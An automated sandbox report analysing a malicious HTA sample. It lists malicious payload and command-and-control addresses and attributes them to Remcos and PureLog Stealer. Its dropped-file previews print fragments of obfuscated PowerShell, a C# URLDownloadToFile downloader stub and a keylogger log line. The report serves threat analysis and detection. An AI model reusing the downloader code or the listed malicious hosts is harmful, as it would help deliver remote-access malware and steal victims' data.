http://geoplugin.net/json.gp/C | powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000003.00000002.2169309335.0000000005451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2292037286.0000000005178000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2292037286.0000000005169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2256807258.0000000004F21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIFL | powershell.exe, 00000003.00000002.2175493809.0000000007C21000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.2171736688.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ia600100.us.archive.org | powershell.exe, 00000009.00000002.2256807258.0000000005321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.2169309335.0000000005451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2292037286.0000000005155000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2256807258.0000000004F21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ia600100.us.archive.org | powershell.exe, 00000009.00000002.2256807258.000000000536C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.168.32.148 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
45.134.140.70 | ramcxx.duckdns.org | Georgia | 197328 | INETLTDTR | true
207.241.227.240 | ia600100.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1518499
                          Start date and time:2024-09-25 18:49:07 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 9m 13s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:LJ1IZDkHyE.hta
                          renamed because original name is a hash value
                          Original Sample Name:d6a04e7ba31d063b7176e3f9fc96c46a.hta
                          Detection:MAL
                          Classification:mal100.rans.troj.spyw.expl.evad.winHTA@19/18@6/3
                          EGA Information:
                          • Successful, ratio: 60%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 82
                          • Number of non-executed functions: 195
                          Cookbook Comments:
                          • Found application associated with file extension: .hta
                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                          • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 5508 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 6128 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: LJ1IZDkHyE.hta
Time | Type | Description
12:50:00 | API Interceptor | 89x Sleep call for process: powershell.exe modified
12:50:50 | API Interceptor | 6359612x Sleep call for process: RegAsm.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.168.32.148 | BL.xls | malicious | Remcos, PureLog Stealer | 104.168.32.148/345/CHPPZA.txt
45.134.140.70 | BL.xls | malicious | Remcos, PureLog Stealer |
207.241.227.240 | hnvc.vbs | malicious | PureLog Stealer |
207.241.227.240 | wm.vbs | malicious | PureLog Stealer, XWorm |
207.241.227.240 | TM3utH2CsU.exe | malicious | PureLog Stealer, XWorm |
207.241.227.240 | BL.xls | malicious | Remcos, PureLog Stealer |
207.241.227.240 | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer |
207.241.227.240 | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer |
207.241.227.240 | AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer |
207.241.227.240 | Order draft.vbs | malicious | Azorult, PureLog Stealer |
207.241.227.240 | SPEC.xls | malicious | Remcos, PureLog Stealer |
207.241.227.240 | US0914424A.xla.xlsx | malicious | Remcos, PureLog Stealer |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ramcxx.duckdns.org | BL.xls | malicious | Remcos, PureLog Stealer | 45.134.140.70
ia600100.us.archive.org | hnvc.vbs | malicious | PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | wm.vbs | malicious | PureLog Stealer, XWorm | 207.241.227.240
ia600100.us.archive.org | BL.xls | malicious | Remcos, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | Order draft.vbs | malicious | Azorult, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | SPEC.xls | malicious | Remcos, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | US0914424A.xla.xlsx | malicious | Remcos, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | IEnetbookCookies.hta | malicious | Cobalt Strike, Remcos, PureLog Stealer | 207.241.227.240
Match | Associated Sample Name / URL | Detection | Threat Name | Context
INTERNET-ARCHIVEUS | hnvc.vbs | malicious | PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | wm.vbs | malicious | PureLog Stealer, XWorm | 207.241.227.240
INTERNET-ARCHIVEUS | TM3utH2CsU.exe | malicious | PureLog Stealer, XWorm | 207.241.227.240
INTERNET-ARCHIVEUS | BL.xls | malicious | Remcos, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | Order draft.vbs | malicious | Azorult, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | SPEC.xls | malicious | Remcos, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | US0914424A.xla.xlsx | malicious | Remcos, PureLog Stealer | 207.241.227.240
INETLTDTR | BL.xls | malicious | Remcos, PureLog Stealer | 45.134.140.70
INETLTDTR | file.exe | malicious | Unknown | 5.104.75.170
INETLTDTR | file.exe | malicious | Unknown | 5.104.75.170
INETLTDTR | file_5822aee2333945a68f99cf2cfdd0e024_2024-09-16_14_28_33_034000.zip | malicious | Unknown | 84.252.92.10
INETLTDTR | Google%20Chrome1.exe | malicious | Unknown | 89.22.236.120
INETLTDTR | Chrome.exe | malicious | Unknown | 89.22.236.120
INETLTDTR | LEK1JCI81P.exe | malicious | RedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWorm | 91.92.120.13
INETLTDTR | sVfXReO3QI.exe | malicious | Unknown | 45.128.38.162
INETLTDTR | ExeFile (305).exe | malicious | Emotet | 178.211.45.66
INETLTDTR | ExeFile (394).exe | malicious | Emotet | 178.211.45.66
AS-COLOCROSSINGUS | DHL Receipt_AWB811070484778.xls | malicious | Unknown | 192.3.220.20
AS-COLOCROSSINGUS | DHL Receipt_AWB811070484778.xls | malicious | Unknown | 192.3.220.20
AS-COLOCROSSINGUS | SDWLLRJcsY.exe | malicious | Remcos, GuLoader | 107.173.4.16
AS-COLOCROSSINGUS | BL.xls | malicious | Remcos, PureLog Stealer | 104.168.32.148
AS-COLOCROSSINGUS | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 192.210.150.29
AS-COLOCROSSINGUS | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer | 192.3.146.145
AS-COLOCROSSINGUS | K0hpP6V2fo.rtf | malicious | DBatLoader, Remcos | 107.175.243.142
AS-COLOCROSSINGUS | C8G355qROx.hta | malicious | Cobalt Strike, Remcos | 107.175.113.252
AS-COLOCROSSINGUS | RFQ-948563836483638563735435376354.xls | malicious | Remcos, GuLoader | 107.173.4.16
AS-COLOCROSSINGUS | xNfDl1NeaI.exe | malicious | Remcos, GuLoader | 107.173.4.16
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Confirmación de pago_shrunk.exe | malicious | AgentTesla | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe | malicious | Snake Keylogger, VIP Keylogger | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exe | malicious | MicroClip | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC, Vidar | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC, Vidar | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | https://osoulksa.com/c/Fidelityme | malicious | HTMLPhisher | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | http://rkanet.com | malicious | Unknown | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | NTGcon.msi | malicious | Unknown | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC, Stealc, Vidar | 207.241.227.240
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | LummaC, Vidar | 207.241.227.240
                                                No context
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):144
                                                Entropy (8bit):3.379519383183141
                                                Encrypted:false
                                                SSDEEP:3:rhlKlRlBfKlnWi5JWRal2Jl+7R0DAlBG45klovDl6v:6l1Cl15YcIeeDAlOWAv
                                                MD5:4C076563C2368A3C5D5C4B579D225744
                                                SHA1:275F0A1998C122D6643AE9CBCA1BCA0DE2797F46
                                                SHA-256:197F83C2C73640E41F73B2F5E88615FAA7EA5ADC023715481D62796D14C71C67
                                                SHA-512:04D2B3FB390394459EB5A58CA280C9EA745851512E548A4445E8D2441FAA6018A6D5EC39D0DA64C5C1073D6674F9A62CE1784BDF218847A8926C557CE2E5792F
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview (UTF-16LE, decoded):[2024/09/25 12:50:18 Offline Keylogger Started] [Program Manager]
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):260242
                                                Entropy (8bit):3.765032305777867
                                                Encrypted:false
                                                SSDEEP:3072:LwUs2qx9vFgTOuYTLaGHcntHONrLgt5psGwH7Hkyb9qGjK6Heo7sQ5CoBAlbjZft:MUgvFgTfYiGHs2/2Gj+ULIoSVZ+zO
                                                MD5:10A145CB87654A33C6C0BEDA947466B8
                                                SHA1:A504192F1B5AC44E6E49B4BC9EF660220C604469
                                                SHA-256:80E7C85EEB0A57E9F50E7D84E0EB1B2F2230837B53080D24696FAB7373E9BC03
                                                SHA-512:FBC4F71668B7AF09338AE7060C04DD8FEED091B3B7ADB490647C92D731CEFCA4B1E929D36F750563FF0AFA14B797984625EAF964F25A3F71B597343D79EC891A
                                                Malicious:false
                                                Preview:..........f.G.U.W.L.a.C.k.k.R.k.W.c.W.a.l.K.J.z.c.K.L.t.L.z. .=. .".d.T.b.A.p.U.N.c.K.A.p.S.K.L.f.U.H.z.K.b.f.c.o.U.l.".....L.P.B.n.c.L.i.u.e.G.e.k.q.T.c.a.n.t.i.s.s.o.c.i.a.l.i.s.t.a.L.P.p.O.B.P.h.e. .=. .".K.z.l.A.Q.S.K.q.Z.m.e.L.p.t.a.c.a.e.e.A.W.u.o.o.i.".....W.b.b.u.W.h.z.U.c.L.i.G.z.v.Q.p.P.G.O.o.J.c.U.r.U. .=. .".L.P.Z.K.i.q.A.L.i.Z.t.P.P.U.U.O.i.i.h.p.t.R.c.d.G.".....p.v.K.Z.o.J.o.H.l.m.m.K.g.p.G.H.e.G.H.Z.z.n.K.L.i. .=. .".a.d.l.W.v.L.P.p.j.Z.R.W.e.k.q.U.W.e.Z.a.N.G.t.A.L.".....B.i.U.z.J.L.L.J.W.b.p.C.Z.L.p.i.R.e.H.s.b.N.W.O.Z. .=. .".R.p.a.L.k.G.N.W.Q.k.W.z.L.W.W.g.W.L.p.x.u.d.G.L.c.".....e.G.g.z.N.t.o.i.W.u.W.f.B.k.c.z.c.m.u.q.Z.j.H.i.g. .=. .".Q.i.e.L.L.A.p.L.L.K.W.b.K.f.f.R.L.L.O.Z.z.B.h.W.i.".....P.W.K.c.c.U.m.c.m.Z.j.f.u.d.n.e.c.P.U.W.W.R.v.f.L. .=. .".l.U.O.P.r.G.C.v.i.K.N.e.i.f.i.t.W.A.I.t.K.Z.Z.k.L.".....a.S.i.z.W.P.O.Q.j.e.p.q.h.h.f.l.Z.b.G.O.s.c.p.A.p. .=. .".L.s.P.K.G.P.N.c.T.U.L.G.k.i.k.m.q.f.o.g.L.o.W.L.O.".....L.b.n.m.I.g.L.A.P.z.J.U.h.R.i.Z.v.K.P.e.i.N.i.K.s. .
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):1.1628158735648508
                                                Encrypted:false
                                                SSDEEP:3:NlllulF//lz:NllU
                                                MD5:795BE6536C807E7B352D2B7A3A42EC19
                                                SHA1:DE9DB41949439FAA0A71910DFB199802DB89A9C4
                                                SHA-256:73940D9FF98EB0D3125D12893A4D2AEBDA218FE74F2AB528CDBE2B3BEF5A56EC
                                                SHA-512:EADAC6DB54621D7ECB0C7086C6321B39D97F49D4AEDA6253190EDF39F2A55F83C294BAC97BDF2DFA1B901DCB648EE0FDF2C3379FA44A593F1BBE4AD5DB5BCBFE
                                                Malicious:false
                                                Preview:@...e................................................@..........
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Wed Sep 25 18:26:38 2024, 1st section name ".debug$S"
                                                Category:dropped
                                                Size (bytes):1332
                                                Entropy (8bit):3.976361557496998
                                                Encrypted:false
                                                SSDEEP:24:HpzW916uZHPwKTFexmfwI+ycuZhN7GakS6XPNnqS2d:584KTAxmo1ul7Ga36FqSG
                                                MD5:A48B039C4F485CE714534ED43C871C20
                                                SHA1:75C7E16E28437EA08654968106F952A4B5598A7C
                                                SHA-256:DCD61E0AF07048F541986D66E6C9F4BDDD55A5BFF18C347BC86F031957563A8F
                                                SHA-512:6401D186FE021265A1BC1F002B54CBEF2D34647384774E85D466C442B4F3130ED792605D06A104703B1EAD55D11BAB024B7AE3C05DF3B0595ED17A854EDB4E7E
                                                Malicious:false
                                                Preview:L....U.f.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP................#S...$...\..............5.......C:\Users\user\AppData\Local\Temp\RES9FA0.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.f.r.v.b.p.i.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                File Type:MSVC .res
                                                Category:dropped
                                                Size (bytes):652
                                                Entropy (8bit):3.086479743002541
                                                Encrypted:false
                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBGak7Ynqq6XPN5Dlq5J:+RI+ycuZhN7GakS6XPNnqX
                                                MD5:EDAB2353B7EFC12415931D5CDFD614AC
                                                SHA1:52A94193F3369251D5ADA83A6F445D5F842C50A9
                                                SHA-256:5110771526C40D0DA5237711E6D6309E8ABDDAC086A4914B9A4079CC15CE1009
                                                SHA-512:D0BCDBA73BA80940AD81DCF0B38ACC3E7E792D0825D75A84EE8A1274B005BF2442A94AC4680D37510444805AB8D565EDFBA3DA487A5B1459B249DBD7651D8BB0
                                                Malicious:false
                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.f.r.v.b.p.i.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.f.r.v.b.p.i.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                Category:dropped
                                                Size (bytes):474
                                                Entropy (8bit):3.7573860321684496
                                                Encrypted:false
                                                SSDEEP:6:V/DsYLDS81zuSOUynPMOfPQXReKJ8SRHy4HNvma84WuO0Vf1Ky:V/DTLDfux1twXfHmq1Ky
                                                MD5:F884800327D4027747DA358D54A2953C
                                                SHA1:B1D1103720A4787BB3CB5832461F367275978422
                                                SHA-256:13DE24EEAFC24C4A53199D015B92DD5DDCD552CEAA74FB14D2BBB26DC6366E9B
                                                SHA-512:CBFD55F5481DA04F30D8590B64CC314751B158CBF775686A11F430B0619D069ADC16C2A387FD1789B49A10AA760B4AB36CB12F96F21C4208ABB89A5F0D52C520
                                                Malicious:false
                                                Preview:.using System;.using System.Runtime.InteropServices;..namespace zgrfzBkDlie.{. public class ko. {. [DllImport("URlMON.Dll", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr xswB,string vCAymqHW,string sDr,uint LR,IntPtr gpyRsuh);.. }..}.
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                Category:dropped
                                                Size (bytes):371
                                                Entropy (8bit):5.192554434438355
                                                Encrypted:false
                                                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fXxX/J0zxs7+AEszI923fXxXVFH:p37Lvkmb6Kzph0WZE2pF9
                                                MD5:FA1654F04E410D6688F4547006B0036A
                                                SHA1:B58227224FE4F02AB43B3B1E5E5E37D94B0BAE0B
                                                SHA-256:89B8285E3C6C29E7F6BFB1E07143CBBF35776C2AC84A03FD4C1E28A62490F62C
                                                SHA-512:F926AF8DB9B92DCF9122274DD68E6A78A04ED219D4F2DCBE982BFCBD5E0F682D7B4F9711B65A9955CD1DB90DE815FF4FD1F0A465FBF47AF206E52725AF1C0388
                                                Malicious:true
                                                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.0.cs"
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):3072
                                                Entropy (8bit):2.8118452624656625
                                                Encrypted:false
                                                SSDEEP:24:etGSjPBG5eM7p8s8SgkCMqzAZwcL4tkZfJAR2pqhkWI+ycuZhN7GakS6XPNnq:6ksM+DMoywivJOR4EH1ul7Ga36Fq
                                                MD5:2EAB0F1D0B0A9365B7CBFA1E054710B1
                                                SHA1:23A4430444673FFD277D27EA31C0F56DEBF38E9D
                                                SHA-256:E41896F226ECB90A08BF1C7DDD8155E0EE88926916B7DE126971178793631959
                                                SHA-512:56DFF43C61385D7A9F446C09E286CDB6490C721555BA94E2328FE5C55C7FF8C065042D43664AD5D5FFB9FEE8C9E76CD5759B75FB5D33BDD18405B05DCAF921DE
                                                Malicious:false
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U.f...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....r.....r.......................................... =.....P ......O.........U.....Z.....c.....g.....j...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.rf
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
                                                Category:modified
                                                Size (bytes):870
                                                Entropy (8bit):5.2784419133544445
                                                Encrypted:false
                                                SSDEEP:24:KMoqd3ka6KzhE2H4Kax5DqBVKVrdFAMBJTH:doika6ahE2H4K2DcVKdBJj
                                                MD5:9B2751C9BF59C7226FB629A8A42BB24F
                                                SHA1:97A534393A034D874696A62B659C2AF8F6D0FC05
                                                SHA-256:5CD4794F5154781B983E3E3CF52DE602E20D3448E3B60A67F7E7FF90EF5A60A9
                                                SHA-512:D20C9F47B651A42D7B8A53247E232A3997E7489B00A3EC2814065164D3882D20AEDB37318A159D459901DD172EF48D6998CFB9CDF7F8A9FD87C640212B0DC9A0
                                                Malicious:false
                                                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):260242
                                                Entropy (8bit):3.765032305777867
                                                Encrypted:false
                                                SSDEEP:3072:LwUs2qx9vFgTOuYTLaGHcntHONrLgt5psGwH7Hkyb9qGjK6Heo7sQ5CoBAlbjZft:MUgvFgTfYiGHs2/2Gj+ULIoSVZ+zO
                                                MD5:10A145CB87654A33C6C0BEDA947466B8
                                                SHA1:A504192F1B5AC44E6E49B4BC9EF660220C604469
                                                SHA-256:80E7C85EEB0A57E9F50E7D84E0EB1B2F2230837B53080D24696FAB7373E9BC03
                                                SHA-512:FBC4F71668B7AF09338AE7060C04DD8FEED091B3B7ADB490647C92D731CEFCA4B1E929D36F750563FF0AFA14B797984625EAF964F25A3F71B597343D79EC891A
                                                Malicious:true
                                                Preview:..........f.G.U.W.L.a.C.k.k.R.k.W.c.W.a.l.K.J.z.c.K.L.t.L.z. .=. .".d.T.b.A.p.U.N.c.K.A.p.S.K.L.f.U.H.z.K.b.f.c.o.U.l.".....L.P.B.n.c.L.i.u.e.G.e.k.q.T.c.a.n.t.i.s.s.o.c.i.a.l.i.s.t.a.L.P.p.O.B.P.h.e. .=. .".K.z.l.A.Q.S.K.q.Z.m.e.L.p.t.a.c.a.e.e.A.W.u.o.o.i.".....W.b.b.u.W.h.z.U.c.L.i.G.z.v.Q.p.P.G.O.o.J.c.U.r.U. .=. .".L.P.Z.K.i.q.A.L.i.Z.t.P.P.U.U.O.i.i.h.p.t.R.c.d.G.".....p.v.K.Z.o.J.o.H.l.m.m.K.g.p.G.H.e.G.H.Z.z.n.K.L.i. .=. .".a.d.l.W.v.L.P.p.j.Z.R.W.e.k.q.U.W.e.Z.a.N.G.t.A.L.".....B.i.U.z.J.L.L.J.W.b.p.C.Z.L.p.i.R.e.H.s.b.N.W.O.Z. .=. .".R.p.a.L.k.G.N.W.Q.k.W.z.L.W.W.g.W.L.p.x.u.d.G.L.c.".....e.G.g.z.N.t.o.i.W.u.W.f.B.k.c.z.c.m.u.q.Z.j.H.i.g. .=. .".Q.i.e.L.L.A.p.L.L.K.W.b.K.f.f.R.L.L.O.Z.z.B.h.W.i.".....P.W.K.c.c.U.m.c.m.Z.j.f.u.d.n.e.c.P.U.W.W.R.v.f.L. .=. .".l.U.O.P.r.G.C.v.i.K.N.e.i.f.i.t.W.A.I.t.K.Z.Z.k.L.".....a.S.i.z.W.P.O.Q.j.e.p.q.h.h.f.l.Z.b.G.O.s.c.p.A.p. .=. .".L.s.P.K.G.P.N.c.T.U.L.G.k.i.k.m.q.f.o.g.L.o.W.L.O.".....L.b.n.m.I.g.L.A.P.z.J.U.h.R.i.Z.v.K.P.e.i.N.i.K.s. .
                                                File type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                Entropy (8bit):2.55207185032906
                                                TrID:
                                                • HTML Application (8008/1) 100.00%
                                                File name:LJ1IZDkHyE.hta
                                                File size:118'193 bytes
                                                MD5:d6a04e7ba31d063b7176e3f9fc96c46a
                                                SHA1:e8929b14ea18c20d4a81ac3faf681031924c9d14
